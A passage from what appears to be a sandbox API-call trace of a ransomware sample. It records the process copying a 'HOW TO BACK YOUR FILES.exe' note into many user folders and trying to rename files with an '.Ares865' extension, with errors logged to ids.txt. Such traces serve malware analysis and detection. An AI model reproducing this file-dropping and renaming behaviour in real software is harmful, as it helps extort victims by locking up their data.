lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.880] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0078.880] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0078.880] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.881] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.881] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.881] GetLastError () returned 0x0 [0078.881] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.881] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.882] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0078.882] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0078.882] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.882] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.883] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.883] GetLastError () returned 0x0 [0078.883] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.883] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.883] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0078.883] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0078.883] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.883] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.884] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.884] GetLastError () returned 0x0 [0078.885] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.885] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.885] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.885] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.885] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.885] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.886] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.886] GetLastError () returned 0x0 [0078.886] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.886] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.886] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.886] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.886] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.887] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.887] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.887] GetLastError () returned 0x0 [0078.887] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.887] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.888] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.888] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.888] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.888] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.889] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.889] GetLastError () returned 0x0 [0078.889] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.889] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.889] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0078.889] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0078.889] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.889] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.890] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.890] GetLastError () returned 0x0 [0078.890] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.890] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.891] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0078.891] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0078.891] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.891] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.891] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.892] GetLastError () returned 0x0 [0079.223] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 83 [0079.223] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.224] GetLastError () returned 0x20 [0079.224] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 105 [0079.224] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 105 [0079.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0079.224] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2fb8 [0079.224] WriteFile (in: hFile=0x120, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x69, lpOverlapped=0x0) returned 1 [0079.225] CloseHandle (hObject=0x120) returned 1 [0079.226] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.226] CloseHandle (hObject=0x0) returned 0 [0079.226] CloseHandle (hObject=0x0) returned 0 [0079.226] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.226] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 90 [0079.226] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.226] GetLastError () returned 0x20 [0079.226] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 112 [0079.226] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 112 [0079.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0079.227] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3021 [0079.227] WriteFile (in: hFile=0x120, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x70, lpOverlapped=0x0) returned 1 [0079.227] CloseHandle (hObject=0x120) returned 1 [0079.227] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.227] CloseHandle (hObject=0x0) returned 0 [0079.227] CloseHandle (hObject=0x0) returned 0 [0079.227] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, 